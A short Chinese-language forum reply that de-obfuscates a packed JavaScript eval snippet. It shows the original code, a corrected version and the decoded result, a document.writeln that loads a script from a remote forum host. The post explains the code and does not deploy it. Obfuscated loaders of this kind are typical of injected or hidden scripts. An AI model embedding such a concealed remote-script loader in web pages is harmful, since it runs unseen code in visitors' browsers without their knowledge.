回复 15# Hopesky
未修改前的代码:
- eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|FCXYXAJO|log|include|net|bbs'.split('|'),0,{}));}
复制代码
修改之后的代码:
- eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4.5("<0 3=2 1=6://d.7.c/b/a.8?9></0>")',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|FCXYXAJO|log|include|net|bbs'.split('|'),0,{}));
复制代码
把修改之后的代码,代入redoce,进行eval清除,就可以得出:
- document.writeln("<script language=javascript src=http://bbs.xcdx169.net/include/log.js?FCXYXAJO></script>")
复制代码 |